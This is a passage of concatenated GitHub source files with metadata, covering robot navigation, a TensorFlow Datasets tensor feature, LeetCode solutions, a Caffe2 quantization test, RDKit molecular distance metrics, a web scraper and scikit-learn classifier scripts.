Lidar(en_marche)\nlidar.thread_scan_lidar.start()\nrobot = Robot(navigation , radioNavigation, lidar, en_marche)\nhas_started_turning = False\n\ntabPosition = [(6 , 0.60) , (8.20 , 0.9), (8.20, 2.20), (6.40, 2.25)]\nindex = 0\nhas_started = False\nsleep(5)\nrobot.initialiserPosition()\nwhile(en_marche):\n \n if(not has_started):\n 
robot.Start_Thread_Avancer(tabPosition[index][0], tabPosition[index][1])\n        has_started = True\n\n    if(robot.arriver_position):\n        if(not has_started_turning):\n            robot.Stop_Thread_Avancer()\n            robot.Tourner(Direction.Gauche)\n            index += 1\n            has_started_turning = True\n    \n    ##Enter this branch once the robot's angle has reached 90 degrees\n    #We use 85 degrees to compensate for hardware delays (with == 90 it turned too far)\n    if((navigation.angleX >= robot.angleX + 85 or navigation.angleX <= robot.angleX - 85) and has_started_turning):\n        robot.Freiner()\n        robot.angleX = navigation.angleX\n        has_started = False\n        has_started_turning = False\n    \n    if(index == len(tabPosition)):\n        en_marche = False\n        robot.Freiner()\n    \nradioNavigation.en_marche = False\nlidar.en_marche = False\nnavigation.en_marche = False\nradioNavigation.thread_get_position.join()\nlidar.thread_scan_lidar.join()\nnavigation.thread_calcul_position.join()\n","repo_name":"Alex6X9X/Conception_Enviro","sub_path":"PFI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10090934442","text":"import enum\nfrom typing import Union\nimport zlib\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow_datasets.core import utils\nfrom tensorflow_datasets.core.features import feature as feature_lib\nfrom tensorflow_datasets.core.proto import feature_pb2\nfrom tensorflow_datasets.core.utils import py_utils\n\nJson = utils.Json\nShape = utils.Shape\n\n\nclass Encoding(enum.Enum):\n  \"\"\"Encoding type of `tfds.features.Tensor`.\n\n  For higher dimension tensors, it is recommended to define the encoding as\n  zlib or bytes to save space on disk.\n\n  Attributes:\n    NONE: No compression (default). bools/integers will be upcasted to int64 as\n      this is the only integer format supported by the\n      [`tf.train.Example`](https://www.tensorflow.org/tutorials/load_data/tfrecord#tftrainexample)\n      protobufs in which examples are saved.\n    BYTES: Stored as raw bytes (avoid the upcasting from above).\n    ZLIB: The raw bytes are compressed using zlib.\n  \"\"\"\n  NONE = 'none'\n  BYTES = 'bytes'\n  ZLIB = 'zlib'\n  # Could eventually add GZIP too (as supported by `tf.io.decode_compressed`\n  # but feel redundant with ZLIB.\n\n\nclass Tensor(feature_lib.FeatureConnector):\n  \"\"\"`FeatureConnector` for generic data of arbitrary shape and type.\"\"\"\n\n  # For backward compatibility with the `features.json` saved by\n  # `FeatureConnector.save_config`\n  ALIASES = ['tensorflow_datasets.core.features.feature.Tensor']\n\n  def __init__(\n      self,\n      *,\n      shape: utils.Shape,\n      dtype: tf.dtypes.DType,\n      # TODO(tfds): Could add an Encoding.AUTO to automatically compress\n      # tensors using some heuristic. However, careful about backward\n      # compatibility.\n      # Would require some `DatasetInfo.api_version = 1` which would be\n      # increased when triggering backward-incompatible changes.\n      encoding: Union[str, Encoding] = Encoding.NONE,\n      doc: feature_lib.DocArg = None,\n  ):\n    \"\"\"Construct a Tensor feature.\n\n    Args:\n      shape: Tensor shape\n      dtype: Tensor dtype\n      encoding: Internal encoding. See `tfds.features.Encoding` for available\n        values.\n      doc: Documentation of this feature (e.g. 
description).\n \"\"\"\n super().__init__(doc=doc)\n self._shape = tuple(shape)\n self._dtype = dtype\n if isinstance(encoding, str):\n encoding = encoding.lower()\n self._encoding = Encoding(encoding)\n\n self._encoded_to_bytes = self._encoding != Encoding.NONE\n self._dynamic_shape = self._shape.count(None) > 1\n\n if self._dtype == tf.string and self._encoded_to_bytes:\n raise NotImplementedError(\n 'tfds.features.Tensor() does not support `encoding=` when '\n 'dtype=tf.string. Please open a PR if you need this feature.')\n\n @py_utils.memoize()\n def get_tensor_info(self) -> feature_lib.TensorInfo:\n \"\"\"See base class for details.\"\"\"\n return feature_lib.TensorInfo(shape=self._shape, dtype=self._dtype)\n\n @py_utils.memoize()\n def get_serialized_info(self):\n \"\"\"See base class for details.\"\"\"\n if self._encoded_to_bytes: # Values encoded (stored as bytes)\n serialized_spec = feature_lib.TensorInfo(shape=(), dtype=tf.string)\n else:\n serialized_spec = feature_lib.TensorInfo(\n shape=self._shape,\n dtype=self._dtype,\n )\n\n # Dynamic shape, need an additional field to restore the shape after\n # de-serialization.\n if self._dynamic_shape:\n return {\n 'shape':\n feature_lib.TensorInfo(\n shape=(len(self._shape),),\n dtype=tf.int32,\n ),\n 'value':\n serialized_spec,\n }\n return serialized_spec\n\n def encode_example(self, example_data):\n \"\"\"See base class for details.\"\"\"\n # TODO(epot): Is there a better workaround ?\n # It seems some user have non-conventional use of tfds.features.Tensor where\n # they defined shape=(None, None) even if it wasn't supported.\n # For backward compatibility, the check is moved inside encode example.\n if self._dynamic_shape and not self._encoded_to_bytes:\n raise ValueError('Multiple unknown dimensions Tensor require to set '\n \"`Tensor(..., encoding='zlib')` (or 'bytes'). \"\n f'For {self}')\n\n np_dtype = np.dtype(self.numpy_dtype)\n if isinstance(example_data, tf.Tensor):\n raise TypeError(\n f'Error encoding: {example_data!r}. 
`_generate_examples` should '\n 'yield `np.array` compatible values, not `tf.Tensor`')\n if not isinstance(example_data, np.ndarray):\n example_data = np.array(example_data, dtype=np_dtype)\n # Ensure the shape and dtype match\n if example_data.dtype != np_dtype:\n raise ValueError('Dtype {} do not match {}'.format(\n example_data.dtype, np_dtype))\n\n shape = example_data.shape\n if isinstance(shape, tf.TensorShape):\n shape = tuple(shape.as_list())\n utils.assert_shape_match(shape, self._shape)\n\n # Eventually encode the data\n if self._encoded_to_bytes:\n example_data = example_data.tobytes()\n if self._encoding == Encoding.ZLIB:\n example_data = zlib.compress(example_data)\n\n # For dynamically shaped tensors, also save the shape (the proto\n # flatten all values so we need a way to recover the shape).\n if self._dynamic_shape:\n return {\n 'value': example_data,\n 'shape': shape,\n }\n else:\n return example_data\n\n def decode_example(self, tfexample_data):\n \"\"\"See base class for details.\"\"\"\n if self._dynamic_shape:\n value = tfexample_data['value']\n # Extract the shape (while using static values when available)\n shape = utils.merge_shape(tfexample_data['shape'], self._shape)\n else:\n value = tfexample_data\n shape = tuple(-1 if dim is None else dim for dim in self._shape)\n\n if self._encoded_to_bytes:\n if self._encoding == Encoding.ZLIB:\n value = tf.io.decode_compressed(value, compression_type='ZLIB')\n value = tf.io.decode_raw(value, self._dtype)\n value = tf.reshape(value, shape)\n\n return value\n\n def decode_batch_example(self, example_data):\n \"\"\"See base class for details.\"\"\"\n if self._dynamic_shape or self._encoded_to_bytes:\n # For Sequence(Tensor()), use `tf.map_fn` to decode/reshape individual\n # tensors.\n return super().decode_batch_example(example_data)\n else:\n # For regular tensors, `decode_example` is a no-op so can be applied\n # directly (avoid `tf.map_fn`)\n return self.decode_example(example_data)\n\n def decode_ragged_example(self, example_data):\n \"\"\"See base class for details.\"\"\"\n if self._dynamic_shape or self._encoded_to_bytes:\n # For dynamic/bytes, we need to decode individual values, so call\n # `tf.ragged.map_flat_values`\n return super().decode_ragged_example(example_data)\n else:\n # For regular tensors, `decode_example` is a no-op so can be applied\n # directly (avoid `tf.ragged.map_flat_values overhead`)\n return self.decode_example(example_data)\n\n @classmethod\n def from_json_content(\n cls, value: Union[Json, feature_pb2.TensorFeature]) -> 'Tensor':\n if isinstance(value, dict):\n return cls(\n shape=tuple(value['shape']),\n dtype=tf.dtypes.as_dtype(value['dtype']),\n # Use .get for backward-compatibility\n encoding=value.get('encoding', Encoding.NONE),\n )\n return cls(\n shape=feature_lib.from_shape_proto(value.shape),\n dtype=feature_lib.parse_dtype(value.dtype),\n encoding=value.encoding or Encoding.NONE,\n )\n\n def to_json_content(self) -> feature_pb2.TensorFeature:\n return feature_pb2.TensorFeature(\n shape=feature_lib.to_shape_proto(self._shape),\n dtype=feature_lib.encode_dtype(self._dtype),\n encoding=self._encoding.value)\n\n\ndef get_inner_feature_repr(feature):\n \"\"\"Utils which returns the object which should get printed in __repr__.\n\n This is used in container features (Sequence, FeatureDict) to print scalar\n Tensor in a less verbose way `Sequence(tf.int32)` rather than\n `Sequence(Tensor(shape=(), dtype=tf.in32))`.\n\n Args:\n feature: The feature to display\n\n Returns:\n Either the feature 
or it's inner value.\n \"\"\"\n # We only print `tf.int32` rather than `Tensor(shape=(), dtype=tf.int32)`\n # * For the base `Tensor` class (and not subclass).\n # * When shape is scalar (explicit check to avoid trigger when `shape=None`).\n if type(feature) == Tensor and feature.shape == (): # pylint: disable=unidiomatic-typecheck,g-explicit-bool-comparison\n return repr(feature.dtype)\n else:\n return repr(feature)\n","repo_name":"xjdlb/my-awesome-tensorlfow-tutorial","sub_path":"datasets-master/tensorflow_datasets/core/features/tensor_feature.py","file_name":"tensor_feature.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"42203715967","text":"\"\"\"\n https://leetcode-cn.com/problems/powx-n/\n https://leetcode-cn.com/problems/powx-n/solution/50-powx-n-kuai-su-mi-qing-xi-tu-jie-by-jyd/\n \n x^n --> x^10 --> (x^5)^2 --> (x*(x^2)^2)^2 = x^2 * ((x^2)^2)^2\n\"\"\"\n\n\nclass Solution:\n def myPow(self, x: float, n: int) -> float:\n if x == 0.0: return 0.0\n res = 1\n if n < 0: x, n = 1 / x, -n\n while n:\n if n & 1: res *= x\n x *= x\n n >>= 1\n return res\n\nclass Solution:\n def myPow(self, x: float, n: int) -> float:\n\n if n == 0: return 1\n \n if n < 0:\n x, n = 1/x, -n\n\n sub_re = self.myPow(x, n//2)\n if n % 2 == 1:\n res = sub_re * sub_re * x\n else:\n res = sub_re * sub_re\n return res\n\n\n","repo_name":"zhouyang412/myleetcode","sub_path":"递归/50. Pow(x, n).py","file_name":"50. Pow(x, n).py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11866232036","text":"import openalea.container\nfrom openalea.deploy.shared_data import shared_data\n#~ data_files = shared_data(openalea.container, pattern='*.inr.gz') # return a list\n\n# -- We load the images corresponding to the different time points\nfrom openalea.image.serial.basics import imread\nt1 = imread(shared_data(openalea.container, 'p58-t1_imgSeg_cleaned.inr.gz'))\nt2 = imread(shared_data(openalea.container, 'p58-t2_imgSeg_cleaned.inr.gz'))\nt3 = imread(shared_data(openalea.container, 'p58-t3_imgSeg_cleaned.inr.gz'))\n\n# -- We create the corresponding SpatialImageAnalysis objets\nfrom openalea.image.algo.analysis import SpatialImageAnalysis, DICT\nanalysis1 = SpatialImageAnalysis(t1, ignoredlabels = [0,1], return_type = DICT)\nanalysis2 = SpatialImageAnalysis(t2, ignoredlabels = [0,1], return_type = DICT)\nanalysis3 = SpatialImageAnalysis(t3, ignoredlabels = [0,1], return_type = DICT)\n\n# -- We don't want to compute values (in `graph_from_image()`) for cells at the margins of the stack.\nanalysis1.add2ignoredlabels( analysis1.cells_in_image_margins() )\nanalysis2.add2ignoredlabels( analysis2.cells_in_image_margins() )\nanalysis3.add2ignoredlabels( analysis3.cells_in_image_margins() )\n\n# -- We now create the PropertyGraphs:\n# - Note:\n# - labels added to the 'ignoredlabels' list are automatically excluded from list creation.\n# - you can specify a list of labels to work with for each graph to create.\nfrom openalea.image.algo.graph_from_image import graph_from_image\ngraph_1 = graph_from_image( analysis1 )\ngraph_2 = graph_from_image( analysis2 )\ngraph_3 = graph_from_image( analysis3 )\n# - The PropertyGraphs will contains these properties by default:\n#~ default_properties2D = ['barycenter','boundingbox','border','L1','epidermis_surface','inertia_axis']\n#~ default_properties3D = 
['volume','barycenter','boundingbox','border','L1','epidermis_surface','wall_surface','inertia_axis']\n\n# -- Now you need the lineage information:\nfrom vplants.mars_alt.alt.mapping import lineage_from_file\n\nlin_12=lineage_from_file(shared_data(openalea.container, 'suiviExpertEntier58-12.txt'))\nl12=lin_12\nlin_23=lineage_from_file(shared_data(openalea.container, 'suiviExpertEntier58-23.txt'))\nl23=lin_23\n\n# --Finally you can create a TemporalPropertyGraph by temporaly linking PropertyGraph:\nfrom openalea.container import TemporalPropertyGraph\ng = TemporalPropertyGraph()\ng.extend([graph_1,graph_2,graph_3],[l12,l23], [0,24,48])\n\n# -- If you want to save this TemporalPropertyGraph:\nimport pickle\nimport gzip\nf = gzip.open('p58_TemporalPropertyGraphs.pklz','w')\npickle.dump( g, f)\nf.close()\n\n","repo_name":"jldinh/vplants","sub_path":"vtissue/imaging/tissue_analysis/doc/user/tutorial_TemporalPropertyGraph_creation.py","file_name":"tutorial_TemporalPropertyGraph_creation.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14949109404","text":"from main import *\nLRpclf = Pipeline([\n ('vect', CountVectorizer(max_df=0.5, ngram_range=(1,2))),\n ('tfidf', TfidfTransformer(norm='l2')),\n ('clf', LogisticRegression()),\n])\n\nLRpclf.fit(X_train, y_train)\ny_pred_lr_val = LRpclf.predict(X_validation)\ny_pred_lr_test = LRpclf.predict(test_data_clean)\nwith open('submissionLR.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow((\"Id\", \"Category\"))\n writer.writerows(zip(test_files_ids, y_pred_lr_test))\n\ndisplay_results(y_validation, y_pred_lr_val)\n\n# 89.66%\n","repo_name":"parthkhanna150/IMDB_Sentiment","sub_path":"log_reg.py","file_name":"log_reg.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14817495779","text":"\n\nimport collections\n\nimport caffe2.python.hypothesis_test_util as hu\nimport hypothesis.strategies as st\nimport numpy as np\nfrom caffe2.python import core, dyndep, workspace\nfrom caffe2.quantization.server.dnnlowp_test_utils import check_quantized_results_close\nfrom hypothesis import given, settings\n\n\ndyndep.InitOpsLibrary(\"//caffe2/caffe2/quantization/server:dnnlowp_ops\")\nworkspace.GlobalInit([\"caffe2\", \"--caffe2_omp_num_threads=11\"])\n\n\nclass DNNLowPMulOpTest(hu.HypothesisTestCase):\n @given(\n N=st.integers(32, 256),\n is_empty=st.booleans(),\n in_quantized=st.booleans(),\n out_quantized=st.booleans(),\n in_place=st.sampled_from([(False, False), (True, False), (False, True)]),\n **hu.gcs_cpu_only\n )\n @settings(deadline=None)\n def test_dnnlowp_elementwise_mul_int(\n self, N, is_empty, in_quantized, out_quantized, in_place, gc, dc\n ):\n if is_empty:\n N = 0\n # FIXME: DNNLOWP Mul doesn't support inplace operation and\n # dequantize_output=1 at the same time\n if in_place[0] or in_place[1]:\n in_quantized = True\n out_quantized = True\n\n # All inputs have scale 1, so exactly represented after quantization\n min_ = -100\n max_ = min_ + 255\n A = np.round(np.random.rand(N) * (max_ - min_) + min_)\n A = A.astype(np.float32)\n if N != 0:\n A[0] = min_\n A[1] = max_\n\n B = np.round(np.random.rand(N) * 255 - 128).astype(np.float32)\n if N != 0:\n B[0] = -128\n B[1] = 127\n\n Output = collections.namedtuple(\"Output\", [\"Y\", \"engine\"])\n outputs = []\n\n engine_list = [\"\", \"DNNLOWP\"]\n for engine in engine_list:\n net = 
core.Net(\"test_net\")\n\n do_quantize = \"DNNLOWP\" in engine and in_quantized\n do_dequantize = \"DNNLOWP\" in engine and out_quantized\n\n if do_quantize:\n quantize_A = core.CreateOperator(\n \"Quantize\", [\"A\"], [\"A_q\"], engine=engine, device_option=gc\n )\n net.Proto().op.extend([quantize_A])\n\n quantize_B = core.CreateOperator(\n \"Quantize\", [\"B\"], [\"B_q\"], engine=engine, device_option=gc\n )\n net.Proto().op.extend([quantize_B])\n\n out = \"Y\"\n if in_place[0]:\n out = \"A\"\n elif in_place[1]:\n out = \"B\"\n\n mul = core.CreateOperator(\n \"Mul\",\n [\"A_q\", \"B_q\"] if do_quantize else [\"A\", \"B\"],\n [(out + \"_q\") if do_dequantize else out],\n dequantize_output=not do_dequantize,\n engine=engine,\n device_option=gc,\n )\n net.Proto().op.extend([mul])\n\n if do_dequantize:\n dequantize = core.CreateOperator(\n \"Dequantize\", [out + \"_q\"], [out], engine=engine, device_option=gc\n )\n net.Proto().op.extend([dequantize])\n\n self.ws.create_blob(\"A\").feed(A, device_option=gc)\n self.ws.create_blob(\"B\").feed(B, device_option=gc)\n self.ws.run(net)\n outputs.append(Output(Y=self.ws.blobs[out].fetch(), engine=engine))\n\n check_quantized_results_close(outputs)\n\n @given(**hu.gcs_cpu_only)\n @settings(deadline=None)\n def test_dnnlowp_elementwise_mul_broadcast(self, gc, dc):\n # Set broadcast and no axis, i.e. broadcasting last dimensions.\n min_ = -100\n max_ = min_ + 255\n A = np.round(np.random.rand(2, 3, 4, 5) * (max_ - min_) + min_)\n A = A.astype(np.float32)\n A[0, 0, 0, 0] = min_\n A[0, 0, 0, 1] = max_\n\n B = np.round(np.random.rand(4, 5) * 255 - 128).astype(np.float32)\n B[0, 0] = -128\n B[0, 1] = 127\n\n Output = collections.namedtuple(\"Output\", [\"Y\", \"engine\"])\n outputs = []\n\n engine_list = [\"\", \"DNNLOWP\"]\n for engine in engine_list:\n net = core.Net(\"test_net\")\n\n mul = core.CreateOperator(\n \"Mul\",\n [\"A\", \"B\"],\n [\"Y\"],\n engine=engine,\n device_option=gc,\n broadcast=1,\n dequantize_output=1,\n )\n net.Proto().op.extend([mul])\n\n self.ws.create_blob(\"A\").feed(A, device_option=gc)\n self.ws.create_blob(\"B\").feed(B, device_option=gc)\n self.ws.run(net)\n outputs.append(Output(Y=self.ws.blobs[\"Y\"].fetch(), engine=engine))\n\n check_quantized_results_close(outputs)\n\n @given(**hu.gcs_cpu_only)\n @settings(deadline=None)\n def test_dnnlowp_elementwise_mul_broadcast_axis(self, gc, dc):\n for bdim, axis in [\n ((3, 4), 1), # broadcasting intermediate dimensions\n ((2,), 0), # broadcasting the first dimension\n ((1, 4, 1), 1),\n ]:\n # broadcasting with single elem dimensions at both ends\n\n min_ = -100\n max_ = min_ + 255\n A = np.round(np.random.rand(2, 3, 4, 5) * (max_ - min_) + min_)\n A = A.astype(np.float32)\n\n B = np.round(np.random.rand(*bdim) * 255 - 128).astype(np.float32)\n\n A.flat[0] = min_\n A.flat[1] = max_\n B.flat[0] = -128\n B.flat[1] = 127\n\n Output = collections.namedtuple(\"Output\", [\"Y\", \"engine\"])\n outputs = []\n\n engine_list = [\"\", \"DNNLOWP\"]\n for engine in engine_list:\n net = core.Net(\"test_net\")\n\n mul = core.CreateOperator(\n \"Mul\",\n [\"A\", \"B\"],\n [\"Y\"],\n engine=engine,\n device_option=gc,\n broadcast=1,\n axis=axis,\n dequantize_output=1,\n )\n net.Proto().op.extend([mul])\n\n self.ws.create_blob(\"A\").feed(A, device_option=gc)\n self.ws.create_blob(\"B\").feed(B, device_option=gc)\n self.ws.run(net)\n outputs.append(Output(Y=self.ws.blobs[\"Y\"].fetch(), engine=engine))\n\n 
check_quantized_results_close(outputs)\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/quantization/server/elementwise_mul_dnnlowp_op_test.py","file_name":"elementwise_mul_dnnlowp_op_test.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"11465763667","text":"\"\"\"Distance metrics for compounds: Tanimoto and maximum common substructure (MCS)\"\"\"\n\nimport itertools\nimport multiprocessing\n\nfrom rdkit import DataStructs\nfrom rdkit.Chem.rdFMCS import FindMCS # pylint: disable=no-name-in-module\nfrom scipy.spatial.distance import squareform # pylint: disable=unused-import\nimport numpy as np\nN_PROCS = multiprocessing.cpu_count()\n\n\ndef _parallel_dist_single(inp_lst, worker_fn):\n \"\"\"Method for multiprocessor distance matrix computation.\"\"\"\n pool = multiprocessing.Pool(processes=N_PROCS)\n inputs = [[k] + inp_lst for k, _ in enumerate(inp_lst[0])]\n ret = pool.starmap(worker_fn, inputs)\n pool.close()\n pool.join()\n\n dists_all = []\n sum_incomp = 0\n for r in ret:\n dists_all.append(r[0])\n sum_incomp += r[1]\n\n # Flattened distance matrix (upper triangle only)\n dists = np.array(list(itertools.chain.from_iterable(dists_all)))\n return squareform(dists), sum_incomp\n\ndef _parallel_dist_multi(inp_lst, worker_fn):\n \"\"\"Method for multiprocessor distance matrix computation.\"\"\"\n pool = multiprocessing.Pool(processes=N_PROCS)\n #TODO: Want to switch order of fps1 and 2?\n inputs = [[inp_lst[0][k]] + inp_lst[1:] for k, _ in enumerate(inp_lst[0])]\n ret = pool.starmap(worker_fn, inputs)\n pool.close()\n pool.join()\n\n dists_all = []\n sum_incomp = 0\n for r in ret:\n dists_all.append(r[0])\n sum_incomp += r[1]\n return np.asarray(dists_all), sum_incomp\n\ndef _tanimoto_worker(k, fps):\n \"\"\"Get per-fingerprint Tanimoto distance vector.\"\"\"\n # pylint: disable=no-member\n sims = DataStructs.BulkTanimotoSimilarity(fps[k], fps[(k + 1):])\n dists_k = [1. - s for s in sims]\n return np.array(dists_k), 0\n\ndef tanimoto_single(fp, fps):\n \"\"\"\n Compute a vector of Tanimoto distances between a single fingerprint and each fingerprint in a list .\n\n Args:\n fp : Fingerprint to be compared.\n\n fps (Sequence): List of ECFP fingerprint vectors.\n\n Returns:\n np.ndarray: Vector of distances between fp and each fingerprint in fps.\n\n \"\"\"\n # pylint: disable=no-member\n sims = DataStructs.BulkTanimotoSimilarity(fp, fps)\n dists = [1. 
- s for s in sims]\n return np.array(dists), 0\n\ndef tanimoto(fps1, fps2=None):\n \"\"\"\n Compute Tanimoto distances between sets of ECFP fingerprints.\n\n Args:\n fps1 (Sequence): First list of ECFP fingerprint vectors.\n\n fps2 (Sequence, optional): Second list of ECFP fingerprint vectors.\n If not provided, computes distances between pairs of fingerprints in fps1.\n Otherwise, computes a matrix of distances between pairs of fingerprints in fps1 and fps2.\n\n Returns:\n np.ndarray: Matrix of pairwise distances between fingerprints.\n \"\"\"\n if fps2 is None:\n dists, _ = _parallel_dist_single([fps1], _tanimoto_worker)\n else:\n dists, _ = _parallel_dist_multi([fps1, fps2], tanimoto_single)\n return dists\n\n\ndef _mcs_worker(k, mols, n_atms):\n \"\"\"Get per-molecule MCS distance vector.\"\"\"\n dists_k = []\n n_incomp = 0 # Number of searches terminated before timeout\n for l in range(k + 1, len(mols)):\n # Set timeout to halt exhaustive search, which could take minutes\n result = FindMCS([mols[k], mols[l]], completeRingsOnly=True,\n ringMatchesRingOnly=True, timeout=10)\n dists_k.append(1. - result.numAtoms /\n ((n_atms[k] + n_atms[l]) / 2))\n if result.canceled:\n n_incomp += 1\n return np.array(dists_k), n_incomp\n\ndef _mcs_single(mol, mols, n_atms):\n \"\"\"Get per-molecule MCS distance vector.\"\"\"\n dists_k = []\n n_atm = float(mol.GetNumAtoms())\n n_incomp = 0 # Number of searches terminated before timeout\n for l in range(0, len(mols)):\n # Set timeout to halt exhaustive search, which could take minutes\n result = FindMCS([mol, mols[l]], completeRingsOnly=True,\n ringMatchesRingOnly=True, timeout=10)\n dists_k.append(1. - result.numAtoms /\n ((n_atm + n_atms[l]) / 2))\n if result.canceled:\n n_incomp += 1\n return np.array(dists_k), n_incomp\n\ndef mcs(mols1, mols2=None):\n \"\"\"\n Computes maximum common substructure (MCS) distances between pairs of molecules.\n\n The MCS distance between molecules m1 and m2 is one minus the average of fMCS(m1,m2) and fMCS(m2,m1),\n where fMCS(m1,m2) is the fraction of m1's atoms that are part of the largest common substructure of m1 and m2.\n\n Args:\n mols1 (Sequence of `rdkit.Mol`): First list of molecules.\n\n mols2 (Sequence of `rdkit.Mol`, optional): Second list of molecules.\n If not provided, computes MCS distances between pairs of molecules in mols1.\n Otherwise, computes a matrix of distances between pairs of molecules from mols1 and mols2.\n\n Returns:\n np.ndarray: Matrix of pairwise distances between molecules.\n\n \"\"\"\n\n n_atms1 = [float(m.GetNumAtoms()) for m in mols1]\n if mols2 is None:\n dists, sum_incomplete = _parallel_dist_single([mols1, n_atms1], _mcs_worker)\n else:\n dists, sum_incomplete = _parallel_dist_multi([mols1, mols2, n_atms1], _mcs_single)\n if sum_incomplete:\n print('{} incomplete MCS searches'.format(sum_incomplete))\n return dists\n\n\nif __name__ == '__main__':\n # Start a server process, which parent forks for child processes\n multiprocessing.set_start_method('forkserver')\n","repo_name":"ATOMScience-org/AMPL","sub_path":"atomsci/ddm/pipeline/dist_metrics.py","file_name":"dist_metrics.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"72"} +{"seq_id":"34842460850","text":"def solution(queue1, queue2):\n answer = -1\n left = sum(queue1)\n right = sum(queue2)\n target = (left+right)//2\n i, j, t = 0, 0, len(queue1)\n if not ((left+right) % 2):\n while i < 2*t and j < 2*t:\n if left < target:\n left += 
queue2[j]\n right -= queue2[j]\n queue1.append(queue2[j])\n j += 1\n elif left > target:\n left -= queue1[i]\n right += queue1[i]\n queue2.append(queue1[i])\n i += 1\n else:\n answer = i + j\n break\n \n return answer\n\nprint(solution([1,4], [4,8]))","repo_name":"AndreaStudy/PythonAlgo","sub_path":"programmers/두큐합같게만들기/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9497584999","text":"import json\n\nimport scrapy\nfrom scrapy.http.response.html import HtmlResponse\n\nfrom .Base import BaseSpider\n\n\nclass YY18(BaseSpider):\n name = \"YY18\"\n base_link = ''\n\n def start_requests(self):\n # 初始页\n urls = [\n 'http://ybj.fujian.gov.cn/was5/web/search?channelid=294271&templet=advsch.jsp&sortfield=-docorderpri%2C-docreltime&classsql=chnlid%3D35207&prepage=150&page=1',\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse, meta={'page': 1})\n\n def parse(self, response: HtmlResponse):\n # 解析列表页\n datas = json.loads(response.text.replace('\\n', '').replace('\\r', '').replace(' ', ''))\n\n if datas['docs'][0]['title'] == '文章标题':\n return\n\n # 解析列表页\n for data in datas['docs']:\n if data['title'] == '文章标题':\n continue\n self.count += 1\n print(self.count)\n save = {}\n save['title'] = data['title']\n save['release_date'] = data['pubtime']\n save['mainbody'] = data['content']\n save['mainbody_table'] = data['title']\n save['annex_link'] = f'http://ybj.fujian.gov.cn/ztzl/yxcg/ggtz/{data[\"file\"]}'\n save['annex_title'] = data['filedesc']\n save['tag'] = int(self.name.replace('YY', ''))\n save['ori_url'] = data['url']\n yield save\n next_page = response.meta['page'] + 1\n yield scrapy.Request(\n url=f'http://ybj.fujian.gov.cn/was5/web/search?channelid=294271&templet=advsch.jsp&sortfield=-docorderpri%2C-docreltime&classsql=chnlid%3D35207&prepage=150&page={next_page}',\n callback=self.parse, meta={'page': next_page})\n","repo_name":"Medical-Knowledge-Atlas/SpiderMan","sub_path":"SpiderMan/medical/YY18.py","file_name":"YY18.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26069946011","text":"import pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport matplotlib.pyplot as plt\nurl = (\n 'https://raw.githubusercontent.com/prasertcbs/basic-dataset/master/iris.csv'\n)\ndf = pd.read_csv(url)\nprint(df.head())\nprint(df.info())\nprint(df.columns)\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn import metrics\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\n\nx_train, x_test, y_train, y_test =train_test_split(df[['sepal_length','sepal_width','petal_length','petal_width']], df.species,test_size=0.3,random_state=7)\n# #Step 1:choose model\n# model=KNeighborsClassifier()\n# #Step2 : fit model\n# model.fit(x_train, y_train)\n# #step3:predict\n# y_pre=model.predict(x_test)\n# #step4 :Score\n# print(model.score(x_test, y_test ))\n\n# #Step 1:choose model\n# model=LogisticRegression()\n# #Step2 : fit model\n# model.fit(x_train, y_train)\n# #step3:predict\n# y_pre=model.predict(x_test)\n# #step4 :Score\n# print(model.score(x_test, y_test ))\n\n# #Step 1:choose model\n# 
model = GaussianNB()\n# #Step2 : fit model\n# model.fit(x_train, y_train)\n# #step3:predict\n# y_pre=model.predict(x_test)\n# #step4 :Score\n# print(model.score(x_test, y_test ))\n\nalgo = [[KNeighborsClassifier(), 'KNeighborsClassifier'],\n [LogisticRegression(solver='lbfgs'), 'LogisticRegression'],\n [GaussianNB(), 'GaussianNB'],\n [GradientBoostingClassifier(), 'GradientBoostingClassifier'],\n [RandomForestClassifier(), 'RandomForestClassifier'],\n [AdaBoostClassifier(), 'AdaBoostClassifier']]\nmodel_score=[]\nfor a in algo:\n model = a[0]\n #Step2 : fit model\n model.fit(x_train, y_train)\n #step3:predict\n y_pre = model.predict(x_test)\n #step4 :Score\n score = model.score(x_test, y_test)\n model_score.append([score,a[1]])\n print(f'{a[1]}score={score}')\n print(metrics.confusion_matrix(y_test, y_pre))\n print(metrics.classification_report(y_test, y_pre))\n print('----------------------------'*3)\nprint(model_score)\ndscore = pd.DataFrame(model_score, columns=['score','Model Classifier'])\n# 